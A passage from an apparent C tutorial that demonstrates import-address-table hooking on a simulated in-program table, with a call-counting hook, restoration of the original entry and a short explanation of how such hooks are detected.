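    for (size_t i = 0; i < n; i++)
        if (strcmp(iat[i].name, name) == 0) { *saved = iat[i].fn; iat[i].fn = hook; return 1; }
    return 0;
}

/* The hook: count the call, block negative handles, otherwise forward to the real function. */
static import_fn g_orig_open;
static int g_hook_hits;
static int hooked_open(int handle) {
    g_hook_hits++;
    if (handle < 0) return -1;
    return g_orig_open(handle);
}

int install_open_hook(void) { return hook_import(g_iat, IAT_LEN, "OpenThing", hooked_open, &g_orig_open); }
int remove_open_hook(void)  { import_fn unused; return hook_import(g_iat, IAT_LEN, "OpenThing", g_orig_open, &unused); }
int hook_hits(void)         { return g_hook_hits; }

int main(void) {
    printf("before: %d\n", program_call("OpenThing", 21));                   /* via imp_open */
    install_open_hook();
    printf("hooked: %d blocked: %d\n", program_call("OpenThing", 21), program_call("OpenThing", -5));
    remove_open_hook();
    printf("restored: %d (hook saw %d calls)\n", program_call("OpenThing", 21), hook_hits());
    return 0;
}
```

The caller never notices the swap because the calling convention and the slot's position are unchanged; that is also why IAT hooks are cheap to detect from the other side: comparing each slot against the address GetProcAddress returns for the same name exposes the redirection.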
